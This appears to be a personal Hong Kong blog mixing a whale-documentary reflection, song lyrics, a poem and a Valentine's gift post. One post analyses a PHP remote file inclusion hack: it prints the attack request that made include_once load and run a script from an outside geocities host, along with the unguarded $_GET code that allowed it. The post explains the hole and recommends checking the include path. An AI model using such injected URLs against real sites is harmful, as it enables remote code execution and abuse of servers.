A Life Among Whales

今晚National Geographic Channel做了2套有關鯨魚的記錄片,

內容值得我們反思。

第一個節目是談到Dr Roger Payne研究鯨魚時的發現,他的研究令世界對鯨魚的看法改變,以及世界對保護鯨魚的努力。另亦提及國際捕鯨協會(International Whaling Commission)在80年代禁止商業捕鯨,各捕鯨國,如丹麥,日本等國,如何用“科學”一詞來繼續無視地繼續捕鯨,以及對國際捕鯨協會(International Whaling Commission)在商討恢復商業捕鯨的無奈。

鯨魚的腦比人類大,而且皮層亦比人類厚,以現在生物學的觀念,是比人類聰明,
但科學家到現時,對鯨魚的智力仍所知甚少。Dr Roger Payne在研究座頭鯨時,發現鯨魚發出的聲音,
以人類的定義,那些聲音叫旋律,以15分鐘為一週期,不斷重複,而且旋律會押韻。
因此推斷,鯨類的智力,至少和人類不相上下。

節目中,Dr Roger Payne有2句話,非常發人深醒,
大意是“若我們連這些大型鯨類,我們有能力保護但都保護不了,我們憑什麼可保護自己”,
“不要以為自己一個就做不了什麼,要改變現在,正是要由自己做起”。

保護環境,救救地球。

終着駅

終着駅

唄:稲垣潤一
詞:秋元康
曲:松本俊明

いつもの街が
いつもと違う
僕たちの角度が
離れた分だけ

君の背中に
重なり合った
人込みは やさしい味方

出逢う時は 偶然でも
別れは 2人のせい

終着駅で
愛が終われば
再会できると
噂に聞いた
終着駅で
君を想えば
いつの日か きっと
もう一度

僕の言葉で
言い尽くせない
後悔は 誤解の痛み

淋しさなら 紛らせても
愛しさ 止められない

始発駅まで
1人歩けば
思い出ばかりと
すれ違うけど
始発駅まで
2人歩いた
なつかしい日々に
また逢える

終着駅で
愛が終われば
再会できると
噂に聞いた
終着駅で
君を想えば
2人折り返す
始発駅

一切又歸於平靜

一切又歸於平靜,

原本開啟的大門,

現在又重新關閉;

為保那最珍貴的,

免再受的衝擊破壞,

現加裝更多鐵閘、門鎖。

大門現已深鎖,

這最珍貴的,

不會再受外間影響,

就讓其在屬於自已的世界生存吧,

讓一切再歸於平靜。

Security Issue in PHP – include_once

There is an interesting hack in an account of our client on our webhosting service. It is an online library system of our client which is written in PHP. One day, the system admin reported that the postfix died becaue of a lot of spam mails sending from the online library system. When I checked the log and saw the log like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I go the the php file and know how the cracker crack the system. The problem is about php.

<?php
...
$pagename =$_GET['Name'];
...
?>
...
<?php include_once("{$pagename}_main.inc");?>
...

The problem is that the $pagename does not have any gruad to check the value that got by $_Get[‘name’].

The function of include_once is allow to include the source from outside, http://example.com/aaa.php

So, when cracker use a ‘http://example.org/aaa.txt?’ as name, and use the url, http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

The $pagename will become http://example.org/aaa.txt? and the indule_once function will execute as:


<?php include_once("http://example.org/aaa.txt?_main.inc");?>

That will executes the php script in http://example.org/aaa.txt and _main.inc will be an ARGV for that php script. This will be a security hole of the system.

So that for security, if it is necessary to use include_once, include function in dynamic,
it has to have a check to see it is from the place you want before.

New Site

This is my new blog. It is for me to put some photos, put down the notes in programming or any other things. I used to use xanga and blogger but I could not get all the functions that I want to have. Also, I have about 5.6GB Photos. It seems that there is no blog or gallery provider allows such kind of large size files. Finally, I would like to host the blog and gallery on my own.

I am from Hong Kong and working in a software house currently. This blog will mainly be in Chinese but partly in English.

願你今夜別離去

一首改編日本歌的歌,而那首日本歌,本人只在二手CD舖聽過,而且不知其歌名。

願你今夜別離去
唱:黎明
曲︰MATSUMOTO TOSHIAKI/AKIMOTO YASUSHI
詞︰劉卓輝
編︰盧東尼

但願在午夜陶醉 世界變恬靜湖水
過去那往事在飄遠去
兩眼合上 矇矓的淚

但願是冷漠憔悴 看透了世事玄虛
遠處那燦爛美景卻要繼續追

多少個夢已累 多少次再失去
是你伴我渡過了最空虛

願你今夜別離去 在我依稀的愛裡
那一刻美麗是錯對 不管有沒有允許
願你今夜別離去 但你匆匆的告退
那披星載月前塵裡 為了伴著誰

但願是冷漠憔悴 看透了世事玄虛
遠處那燦爛美景卻要繼續追

多少個夢已累 多少次再失去
是你伴我渡過了最空虛

願你今夜別離去 在我依稀的愛裡
那一刻美麗是錯對 不管有沒有允許
願你今夜別離去 但你匆匆的告退
那披星載月前塵裡 為了伴著誰

願你今夜別離去 在我依稀的愛裡
那一刻美麗是錯對 不管有沒有允許
願你今夜別離去 但你匆匆的告退
那披星載月前塵裡 為了伴著誰

情人節禮物?

情人節快到,
不知已有另一半的各位會如何和另一半慶祝?

在現在以消費為主的社會,情人節是一個非常好的賺錢節日,
就連香港郵政亦有其產品。

“香港郵政獨家呈獻情人節精選禮品系列,為您和摯愛締造浪漫驚喜!”

這是郵政署特意在情人節推出的產品,
而且亦會準時在情人節當日送到對方的地址。
不過,這只可派送至香港本地地址。

http://www.shopthrupost.hk/?lang=2